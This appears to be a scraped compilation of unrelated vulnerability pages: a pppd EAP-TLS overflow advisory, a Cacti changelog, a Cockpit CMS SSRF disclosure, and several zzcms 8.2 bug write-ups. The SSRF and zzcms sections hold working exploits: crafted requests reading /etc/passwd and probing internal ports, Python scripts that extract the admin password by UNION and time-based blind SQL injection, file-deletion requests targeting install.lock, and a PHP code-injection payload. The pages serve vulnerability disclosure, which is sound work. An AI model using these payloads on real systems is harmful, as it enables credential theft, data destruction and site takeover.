Improper input validation together with an integer overflow in the EAP-TLS protocol implementation in PPPD may cause a crash, information disclosure, or authentication bypass. This implementation is distributed as a patch for PPPD 0.91, and includes the affected eap.c and eap-tls.c files. Configurations that use the `refuse-app` option are unaffected.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 11 Jun 2018 14:57:16 -0400
From: Luciano Bello <luciano@...ian.org>
To: oss-security@...ts.openwall.com
Cc: team@...urity.debian.org
Subject: Buffer Overflow in pppd EAP-TLS implementation

- Software: pppd, in particular the EAP-TLS patch\[1\]

- Summary: Several buffer overflows can be trigger even when pppd is not
configured to take EAP-TLS (but the binary was patched with the
extension).

- CVE: CVE-2018-11574

- Credit:
Ivan Gotovchits <ivg@...e.org>, from Carnegie Mellon University Binary
Analysis Team

- Background:
We, the Debian security team, received the report and contacted the
package maintainer and upstream. Upstream and submitter work together to
agree a patch.

- Patch:
attached.

- Relevant parts of the original report:


We would like to report a security vulnerability that we have discovered
in the EAP-TLS patch for pppd \[1\]. Improper input validation together
with an integer overflow may cause a crash on both sides and, unlikely,
may lead to the information disclosure or authentication bypass.

Detailed Description
===============

Context
-----------

The \`eaptls\_receive\` function (eap-tls.c) is used to process data passed
via the ppp channel. It is used on both peer and authenticator sides and
is tasked to process and accumulate fragmented messages and pass them to
the SSL backend for the authentication. The message format is described
in RFC 5216. The \`eaptls\_receive\` function is called by \`eap\_response\`
(eap.c) and \`eap\_request\` (eap.c), which implement the \`input\` method
of the EAP protocol, that is invoked in the \`get\_input\` (main.c)
procedure, when the EAP protocol is enabled.

Problem Description
---------------------------

The EAP TLS protocol uses packages with variable lengths and passing a
short package message will result in the out-of-bounds read (CWE-125)
and calling \`memcpy\` with a negative length parameter will lead to the
buffer overread (CWE-126), as well as the buffer overflow (CWE-122).
Details, follow.

The \`eaptls\_receive\` function is called with three parameters, the
session pointer \`ets\`, the pointer \`inp\` to the buffer that contains
data received by the ppp channel, and the length \`len\` of this buffer.
The \`len\` parameter is a signed \`int\`.

Under all paths that reach this point, the constraint on the \`len\`
parameter is \`len >= 0\`, i.e., all checks before the invocation only
verify that the message is long enough to be dispatched. Every check
advances the pointer and decrements the length. For example,

     - main.c:1048-1058 // ensures that len was at least 4
     - eap.c:2077-2083  // ensures that len was at least 1

There are no checks of the \`len\` parameter in the \`eaptls\_receive\`
function at all. The very first operation (eap-tls.c:804) in the
function is to read the flags field, that is not guaranteed to be
present, as \`len\` could be \`0\` here.  There are few more unbounded reads
at \`eap-tls.c:812\` and \`eap-tls.c:838\`. Each read is accompanied with
the corresponding decrementation of the length parameter. Thus, in case
of a short package, the length could have a negative value (anything
between -1 and -5). The check \`!(len + ets->datalen > etc->tlslen)\` is
passed easily since \`len\` is negative, thus the \`memcpy\` call
(obfuscated with the BCOPY macro) will receive the negative \`len\`
parameter, that will most likely result in the segmentation fault and a
crash of the server or client.


More Advanced Scenarios
-----------------------------------

We're hypothesizing, that instead of crashing the daemon it is
theoretically possible to overwrite server memory structures, during the
buffer-overflow in \`memcpy\` in such way that it will change the state of
authentication FSM to a more advanced state (e.g., to the authenticated
state). To achieve this, an adversary may rely on the Session Resumption
mechanism (RFC 5216, section 2.1.2), create the first session and put it
on hold, then create several other sessions and fill in the memory of
the server until the brk raises till the 4Gb bar (the \`len\` parameter is
32 bit in x86 and x86-64), then the first session could be resumed, and
the \`memcpy\` won't cause the segmentation fault, but overwrite internal
structures of the server.

We did not investigate this scenario any further.


Further Details
--------------------

The vulnerability was detected using the Memcheck verification tool of
the Primus Microexecution Framework (a part of the CMU Binary Analysis
Framework \[2\]). We ran it on a vanilla \`pppd\` binary as shipped in
Ubuntu Xenial. All source code references are made on the patched source
obtained with \`apt-source\`. Primus runs a program in the emulated
environment. A reduced trace showing the problem is attached (in IDA Pro
format and in plain-text)

**View attachment "**ppp-2.4.7-eaptls-mppe-1.101a.patch**" of type "**text/x-patch**" (88939 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-11574: security - Buffer Overflow in pppd EAP-TLS implementation

The script '/adminui/error_details.php' in the Quest KACE System Management Appliance 8.0.318 allows authenticated users to conduct PHP object injection attacks.

CVE-2018-11135

Cacti before 1.1.37 has XSS because it makes certain htmlspecialchars calls without the ENT_QUOTES flag (these calls occur when the html_escape function in lib/html.php is not used).

Type

ID

Text

feature

Add a Timeout setting for Remote Agent calls

feature

Add Graphs and Data Sources hyperlinks on Device page

feature

Add One Minute Sampling to the default Data Source Profiles

feature

Add support for DDERIVE and DCOUNTER to Cacti

feature

Add Timezone support for Remote Data Collectors

feature

Allow Adding Aggregate Graphs to a Report

feature

Allow ASCII filepath paths to not be found on settings save

feature

Allow drill down from Graphs to Data Queries or Templates

feature

Allow Import/Export to be hookable

feature

Allow snmpagent to be disabled for very large installs

feature

Allow Top tabs to be Glyphs or Text or both

feature

Big Spanish translation update plus massive QA fixes

feature

Change password page provides visible confirmation of password rules

feature

Do not allow second data source to be added to an SNMP Get data template

feature

Don't allow removal of Data Sources from Data Template once its in use

feature

Inform the primary Cacti administrator of problems by Email

feature

Make all user settings dynamic and allow resetting to default.

feature

Make Graph and Data Source suggested naming more efficient

feature

Make it easy to find Data Query based graphs that have lost indexes

feature

Make Top Tabs use Ajax Callback

feature

Make tree editing responive

feature

New Install/Upgrade user permission to limit access to being able to upgrade

feature

Provide option to debug width errors where output exceeds column width

feature

Removed the Authentication Method of 'None'

feature

Tree automation is now defaulted to on for new install

feature

Update JavaScript library c3.js to version 0.6.8

feature

Update JavaScript library Chart.js to 2.7.3

feature

Update JavaScript library d3.js to version 5.7.0

feature

Update JavaScript library jquery.js to 3.3.1

feature

Update JavaScript library jquery-migrate.js to 3.0.1

feature

Update JavaScript library jquery.tablesorter.js to version 2.30.7

feature

Update JavaScript library jstree.js to 3.3.7

feature

Update JavaScript library screenfull.js to 3.3.3

feature

Update phpmailer to version 6.0.6

feature

Update phpseclib to version 2.0.13

feature

289

Allow external nologin access for Realtime Graphs

feature

553

When display a host, include Aggregated Graphs as well as standard graphs

feature

614

Allow users to duplicate Data Input Methods

feature

973

When creating a new user authenticated via LDAP, attempt to retrieve users email and full name

feature

122

Support a Site Branch Type

feature

1060

Design Enhancement for Large scale Cacti Implementations

feature

1142

Add Site dropdown to the Graphs and Data Source pages

feature

1184

Improve Data Input Methods editability and message handling

feature

1200

Aggregate Graphs can now include COMMENT

feature

1282

Email notification for Automation Network discovery process

feature

1347

Update automation logging to work better

feature

1395

Ensure messages have each new line keep the same prefix in cacti\_log()

feature

1399

Allow 'requires' to include version against a plugin

feature

1400

User settings are now dynamic and can be reset (removed) to return to global settings

feature

1422

Automatically select the next unused data input field when clicking add on data input method

feature

1505

When displaying a graph, provide breadcrumb link to edit device

feature

1527

Update Fontawesome from 4.7 to 5.0.10

feature

1580

Support Drag & Drop for Builtin Report Items

feature

1581

Allow Mass Adding of Graphs to Reports

feature

1584

Allow theme selection when installing

feature

1588

Check that PHP can run a test file

feature

1593

Allow External links to auto refresh

feature

1597

Ensure synchronised files have same attributes as originals

feature

1610

On Unix, redirect error messages to log files when running external scripts

feature

1628

Allow the User to define an initial Automation Network for discovery when installing

feature

1670

Improve Graph Management to show type of source for a graph

feature

1671

When duplicating a Graph Template, properly duplicate Data Query Graph Template Mappings

feature

1677

Default Tree nodes sorting to be inherited

feature

1691

On Graph context menu, add a 'Copy graph' option to copy graph image

feature

1692

Separate option for logging Input Validation issues

feature

1703

On Graph context menu, text is now multi-lingual

feature

1708

Allow the User to override global Automation email recipients at the Automation Network level

feature

1709

Suppress warning from RRDTool when attempting to make updates in the past

feature

1711

Add support for SSL connections to MySQL

feature

1731

Prevent loss of changes by warning user about unsaved items

feature

1734

When displaying a graph, provide more information when error image is displayed (see also #1428)

feature

1763

Enable automatic refresh for Time Graph View

feature

1806

Control low level debug routines via config.php (Develoepr Use)

feature

1819

Provide CLI program to enable graphs to be removed by scripts

feature

1969

Graph previews can now be linked using a host's external id

feature

2006

Introduce new Data Source Profile to handle decade long graphs

feature

2173

Introduce Device and Graph Template Caching to Speed UI

feature

2228

Add Device ID to Device search field

issue

Fix issue with display\_custom\_error\_message() causing problem with system error message handling

issue

Graph List View was not fully responsive

issue

Move Graph removal function to Graph API

issue

On the Data Sources page, if there is no filtered Device and a Data Source is edited, device association is lost

issue

Typo in Dutch translations when an error occurred while downgrading

issue

Unable to display user profile tabs

issue

Verify all Fields not working due to Cacti 1.x upgrade error

issue

186

Cacti does not support jQueryUI 1.12.x

issue

187

Remove the use of jQuery Migrate plugin

issue

948

Do not create a new datasource when adding a new Graph for the same device/field

issue

454

Cacti Re-Index does not resolve index changes properly during re-index

issue

983

Import Template Preview is misleading

issue

1097

When copying template user, newly created user should always be enabled to allow logging in

issue

1097

When copying template user, it should be disable to prevent logging in as template user directly

issue

1174

When display a tree, disable drag and drop unless in edit mode

issue

1298

Display fatal error to prevent issues caused when system log is not writable

issue

1350

When switching an Automation Tree Rule's leaf type, remove invalid Automation Rule Items

issue

1383

CSRF Timeout does not obey session timeout

issue

1408

Update SQL / Backtrace to use new clean\_up\_lines() function

issue

1414

DSSTATS reports incorrectly that a data source does not exist

issue

1420

Fix issues found by Debian package builds

issue

1421

Fix issue when SQL had all bad modes, missing variable warning was generated

issue

1426

Fix issue where remote poller was not using unique filenames when attempting to verify files

issue

1437

Plugin install hover message sometimes shows line breaks rather than formatted text

issue

1454

When using oid\_regexp\_parse, filter indexes to those that match

issue

1473

Recovery Date overwritten by subsequent checks

issue

1494

Unable to Deep Link/Bookmark Trees

issue

1503

Undefined function clearstatscache in DSSTATS

issue

1507

When saving graph settings from the graph page, the graph template id should not be included

issue

1510

New Graphs Undefined Variable $graph\_template\_name

issue

1521

Force boost to be enabled when there are Remote Data Collectors

issue

1528

Saving a device can result in WARNINGS related to string vs array handling

issue

1529

Allow Aggregate Graphs to Sum Bandwidth and Percentile COMMENTS

issue

1543

Graph Preview appends header=false too many times

issue

1553

Poller does not set rrd\_step\_counter correctly if no steps taken

issue

1559

CLI Output Issues due to over escaping

issue

1560

Warning that escapeshellarg() is escaping a null

issue

1567

Technical support - add notification if Cacti and Spine version is different

issue

1574

User templates are not correctly being applied

issue

1589

Installer now checks that the temporary folder is writable

issue

1590

User Admin generates SQL error if user is not part of any groups

issue

1601

Aggregate Graphs can not include some classes of COMMENT

issue

1602

PHP ERROR: Call to undefined function api\_data\_source\_cache\_crc\_update()

issue

1604

Failed to connect to remote collector

issue

1606

Boost debug log not functional

issue

1607

Boost next run time occurs in the past

issue

1608

Possible boost race conditions

issue

1609

Remote pollers update 'stats\_poller' on main poller

issue

1617

Editing a data query results in missing $header variable

issue

1621

Realtime Popup can cause automatic logout

issue

1626

httpd-error.log have message about Fontconfig

issue

1634

Default snmp quick print setting resulting in false poller ASSERTS on some php releases

issue

1651

Check temporary folder has write access during import

issue

1655

Correct Cacti to handle new MySQL 8.0 reserved word \`system\`

issue

1658

Devices drop down should be filtered by Site

issue

1660

Reports based upon Tree don't maintain graph order

issue

1665

Must change password not working for local users when main realm is not local

issue

1669

Console log header grammar issue

issue

1674

Threads and Processes values not migrated to Poller table during upgrade

issue

1676

Allow automation discovery to add the same sysname on different hosts

issue

1682

Slow Select Statement lib/api\_automation.php

issue

1689

Technical Support's RRDTool version should show detected RRD version

issue

1690

Report a warning if the default collation is not utf8mb4\_unicode\_ci

issue

1700

Mail sent without auth causes errors to appear in logs

issue

1710

RRDtool create command causes first update to fail

issue

1721

Console Side Bar not correct on first login

issue

1723

die() messages should include PHP\_EOF for better logging

issue

1726

Poor page performance editing a Graphs Graph Items

issue

1746

Poller with no hosts does not exit until timeout is reached

issue

1761

Graph Management page shows bogus template names

issue

1783

Browser Back button still does not working

issue

1796

Import: Fixed handling of references to objects not included in file

issue

1799

Default User log sort should be date descending

issue

1810

Correct SQL errors with authentication set to no authentication

issue

1839

Dummy cosmetic bug on down device selection option

issue

1841

Data Source Stats table not properly migrated from pre 1.x Cacti plugin

issue

1849

SNMPAgent not sending traps

issue

1852

Reports Preview/Mails show no graphs

issue

1889

Insecure $ENV{ENV} which running setgid

issue

1901

Upgrade from 0.8.8h fails on external\_links statement

issue

1921

Data Query XML field method 'rewrite\_index' does not correctly query for value

issue

1926

Deselecting items should present warning or disable GO button

issue

1948

Device Template should warn about need to re-sync

issue

1953

set\_default\_action() should warn if more than one action provided

issue

1973

SpikeKill Menu does not display properly

issue

1976

Default admin permissions do not allow everything

issue

1982

Certain hooks should occur within api functions rather than UI functions

issue

2002

api\_plugin\_db\_table\_create should support non-string defaults

issue

2012

For kernel 3.2+, "Linux - Memory - Free" should grep for "MemAvailable:", not "MemFree:"

issue

2085

CLOG Regex Parser does not verify registered function exists

issue

2126

api\_device.php generates undefined function poller\_push\_to\_remote\_db\_connect()

issue

2127

Unable to save error when duplicating graph

issue

2135

api\_tree\_lock() and api\_tree\_unlock() forcing redirection incorrectly

issue

2143

export.php Illegal string offset 'method'

issue

2144

Device Management "Status" column does not sort properly

issue

2152

When editing a device, should show disable/enable option

issue

2153

Utilities page issues the wrong hook for tabs

issue

2163

LDAP functions are not consistent

issue

2164

Login page does not remember selected realm

issue

2171

datepicker and timepick translation not available

issue

2178

Header/Footer included more than once

issue

2182

Graph View missing 'html\_graph\_template\_multiselect()' function

issue

2184

html\_host\_filter() does not handle host\_id consequently

issue

2186

Boost generates invalid SQL during on demand update

issue

2188

SNMP timeout errors are being duplicated

issue

2191

i18n\_themes is not properly primed in global\_arrays.php

issue

2202

Can't create more than one graph with add\_graphs.php from one template

issue

2207

Removing Graph Template does not Remove Data Query Associations

issue

2217

cmd.php not handling quoted snmp values properly

issue

2240

SNMP system Data Input Methods should not be modified on import

issue

2241

Spike removal not functional due to Debian packaging

security

1072

Prevent exploitation of Data Input Methods to escalate privileges (CVE-2009-4112)

security

1882

Bypass output validation in select cases

security

2212

Stored XSS in "Website Hostname" field

security

2213

Stored XSS in "Website Hostname" field - Devices

security

2214

Stored XSS in "Vertical Label" field - Graph

security

2215

Stored XSS in "Name" field - Color

unknown

CVE-2018-10061: The Complete RRDTool-based Graphing Solution

SSRF (Server Side Request Forgery) in Cockpit 0.13.0 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter, related to use of the discontinued aheinze/fetch_url_contents component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: "service () baimaohui net" <service () baimaohui net>  
_Date_: Wed, 4 Apr 2018 20:50:10 +0800  

\# SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)

The Cockpit CMS is awesome if you need a flexible content structure but don't want to be limited in how to use the 
content.

## Product Download: https://getcockpit.com/

## Vulnerability Type：SSRF（Server Side Request Forgery）

## Attack Type : Remote

## Vulnerability Description

Cockpit CMS uses a \`fetch\_url\_contents\` （https://github.com/aheinze/fetch\_url\_contents）project code on github website, 
This Project has SSRF Vulnerability，So affect the system.

The vulnerability code（/assets/lib/fuc.js.php）:

    if (isset($\_REQUEST\['url'\])) {

        // allow only query from same host
        echo(parse\_url($\_SERVER\['HTTP\_REFERER'\],PHP\_URL\_HOST));
    
        if ($\_SERVER\['HTTP\_HOST'\] != parse\_url($\_SERVER\['HTTP\_REFERER'\], PHP\_URL\_HOST)) {
            header('HTTP/1.0 401 Unauthorized');
            return;
        }
    
        $url     = $\_REQUEST\['url'\];
        $content = '';
    
        if (function\_exists('curl\_exec')){
            $conn = curl\_init($url);
            curl\_setopt($conn, CURLOPT\_SSL\_VERIFYPEER, true);
            curl\_setopt($conn, CURLOPT\_FRESH\_CONNECT,  true);
            curl\_setopt($conn, CURLOPT\_RETURNTRANSFER, 1);
            curl\_setopt($conn,CURLOPT\_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like 
Gecko) Chrome/24.0.1312.52 Safari/537.17');
            curl\_setopt($conn, CURLOPT\_AUTOREFERER, true);
            curl\_setopt($conn, CURLOPT\_FOLLOWLOCATION, 1);
            curl\_setopt($conn, CURLOPT\_VERBOSE, 0);
            $content = curl\_exec($conn);
            curl\_close($conn);
        }
        if (!$content && function\_exists('file\_get\_contents')){
            $content = @file\_get\_contents($url);
        }
        if (!$content && function\_exists('fopen') && function\_exists('stream\_get\_contents')){
            $handle  = @fopen ($url, "r");
            $content = @stream\_get\_contents($handle);
        }
    
        if (!$content) {
            header('HTTP/1.0 503 Service Unavailable');
        }
    
        return print($content);
    }


## Exploit

    GET /assets/lib/fuc.js.php?url=dict://127.0.0.1:3306 HTTP/1.1
    Host: 127.0.0.1
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 
Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\*/\*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8
    referer:http://127.0.0.1/index.php

modify the above url parameter，example，file:

request http(s) protocol: url=http(s)://www.google.com

file read：url=file:///etc/passwd or url=file:///c:/windows/win.ini

If the curl function is available,then use gopher、tftp、http、https、dict、ldap、file、imap、pop3、smtp、telnet protocols 
method，if not then only use http、https、ftp protocol

scan prot,example: url=dict://127.0.0.1:3306 
use gopher protocol: url=gopher://127.0.0.1:3306 

If the curl function is unavailable,this vulnerability trigger need allow\\\_url\\\_fopen option is enable in 
php.ini，allow\\\_url\\\_fopen option defualt is enable.

## Versions

Cockpit 0.13.0

## Impact

SSRF(Server Side Request Forgery) in Cockpit 0.13.0 version allow remote attackers to arbitrary files read，scan network 
port，information detection,internal network server attack.

## Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang &  National Computer Network Emergency Response 
Technical Team/Coordination Center of China (CNCERT/CC)

## References

CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14611

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)** _service () baimaohui net (Apr 06)_

CVE-2017-14611: SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)

An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in a dl/dl_sendsms.php request.

**/dl/dl\_sendsms.php****Edition**

zzcms 8.2

**Location**

/dl/dl_sendsms.php

**Code**

$sql2=$sql." order by id asc limit $n,$size";

**Rows:73****Harm**

can get password through SQL injection

Cause the cause Take a look at the logic of the bug,If the POST request is not empty, the $sql value will be equal to $\_POST\["sql"\], $sql will be assigned to $sql2, $sql2=$sql." order by id asc limit $n,$size";

$sql not added ' ' This will cause SQL inject

 

Construct payload verification

sql=select email from zzcms\_dl where id=-1 union select group\_concat(distinct table\_name) from information\_schema.columns where table\_schema=database()#

 

**poc**

import requests
import string


url = "http://192.168.199.23/dl/dl\_sendmail.php"
cookies = {
'UserName':'1234','PassWord':'81dc9bdb52d04dc20036dbd8313ed055'}
flag = ''

data = {
     'sql':'select email from zzcms\_dl where id=-1 union select pass from zzcms\_admin #'
   }

r = requests.post(url,data,cookies=cookies)
r.encoding = 'utf-8'
print(r.text)

\[6\]

Get the administrator password

 \[6\]: ./images/6.png "6"

CVE-2018-9309: vulnerability/dl_sendsms.php.md at master · lihonghuyang/vulnerability

An issue was discovered in zzcms 8.2. user/manage.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg or oldflv parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

title

tags

grammar\_cjkRuby

manage.php

bug

true

**/user/manage.php****Edition :**

zzcms 8.2

**Location**

/user/manage.php

**Code:**

if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
	$f\="../".$oldimg;
	if (file\_exists($f)){
	unlink($f);
	}
	$fs\="../".str\_replace(".","\_small.",$oldimg);
	if (file\_exists($fs)){
	unlink($fs);		
	}
}
if ($oldflv<>$flv){
	$f\="../".$oldflv;
	if (file\_exists($f)==true){
	unlink($f);
	}
}

**Rows : 61****Harm**

Allows attackers to delete files arbitrarily

**Cause the cause**

First analyze the code, the first condition is action=modify

Satisfaction condition, must make the judgment of founderr=1, that is to say, must make content not empty

In this case, direct control of the data in **oldimg** or **oldflv**. POST ,then value can be achieved.

**poc**

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

**Solution**

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

CVE-2018-8968: vulnerability/manage.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. user/licence_save.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

title

tags

grammar\_cjkRuby

licence\_save.php

bug

true

**user/licence\_save.php****Edition :**

zzcms 8.2

**Location**

/user/licence_save.php

**Code:**

if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
			$f\="../".$oldimg;
			if (file\_exists($f)){
			unlink($f);
			}
			$fs\="../".str\_replace(".","\_small.",$oldimg)."";
			if (file\_exists($fs)){
			unlink($fs);		
			}
		}

**Rows : 31****Harm**

Allows attackers to delete files arbitrarily

**Cause the cause**

Through the code can know that we only control oldimg, and it did not carry out the appropriate filtering

first create test.php

Then perform the operation, remember to meet $oldimg<>$img && $oldimg<>"/image/nopic.gif"

Then execute

Then find test.php is gone

**poc**

GET:
http://127.0.0.1:8080/user/licence\_save.php?action=modify
POST:
id=11&oldimg=test.php&img=1231

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

**Solution**

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

CVE-2018-8969: vulnerability/licence_save.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in an adv2.php?action=modify request.

Permalink

Cannot retrieve contributors at this time

title

tags

grammar\_cjkRuby

adv2.php

新建,模板,小书匠

true

**/user/adv2.php****Edition :**

zzcms 8.2

**Location**

/user/adv2.php

**Code:**

$rs=query("select * from zzcms_ad where id=".$_POST["id"]."");

**Rows : 72****Harm**

Can get password through SQl injection

**Cause the cause**

Take a look at the logic of the bug, first slowly back up and found that need to enter here first and need to make a, c not all 0

That is to say, let **zzcms\_main** or **zzcms\_zh** have a value. Adding it directly tells the user that they do not have permission.In this case, directly POST

Then go back and find that need to let action=modify

At this point , first debug it, directly in phpstorm debugging id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0), found that there really is Delay.

**poc**

import requests
import string
s = requests.session()
url = "http://127.0.0.1:8080/user/adv2.php?action=modify"
cookies = {
'UserName':'test2'
}
flag = ''
for i in range(1,40):
 for j in range(33,125):
   data = {
     'id':'0 or if((select ascii(substr(pass,{},1)) from zzcms\_admin)={},sleep(3),0)'.format(i,j)
   }
   #print data
   r = s.post(url,data=data,cookies=cookies)
   #print r.text
   sec=r.elapsed.seconds
   #print i,j,sec
   if sec >2:
     flag += chr(j)
     print flag
     break
print flag

Get the administrator password

CVE-2018-8967: vulnerability/adv2.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. It allows PHP code injection via the siteurl parameter to install/index.php, as demonstrated by injecting a phpinfo() call into /inc/config.php.

Permalink

Cannot retrieve contributors at this time

title

tags

grammar\_cjkRuby

install

bug

true

**Edition :**

zzcms 8.2

**Location**

/install/index.php

**Code:**

$str=str_replace("define('siteurl','".siteurl."')","define('siteurl','$url')",$str) ;

**Rows : 114****Harm**

Website information leaked

**Cause the cause**

The parameters here will be stored in /inc/config.php, so if I construct the corresponding statement, close the brackets, so that i can successfully perform sql injection.Due to waf reasons, only can control **siteurl**

Write siteurl=1');phpinfo();#

The discovery can be performed, due to the need to verify the database information before, so the use of the premise is that the install directory is not deleted, and should guess the database user name password

**poc**

**str** Parameter result：

finally successful

CVE-2018-8966: vulnerability/install.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. user/ppsave.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

title

tags

grammar\_cjkRuby

ppsave.php

bug

true

**/user/ppsave.php****Edition :**

zzcms 8.2

**Location**

/user/ppsave.php

**Code:**

if ($oldimg<>$img && $oldimg<>"image/nopic.gif") {
	//deloldimg
		$f\=$oldimg;
		if (file\_exists($f)){
		unlink($f);		
		}
		$fs\=str\_replace(".","\_small.",$oldimg);
		if (file\_exists($fs)){
		unlink($fs);		
		}

**Rows : 68****Harm**

Allows attackers to delete files arbitrarily

**Cause the cause**

First analyze the code, the first condition is action=modify

There is no other previous condition, just can directly control oldimg

**poc**

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

**Solution**

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

Tag

#php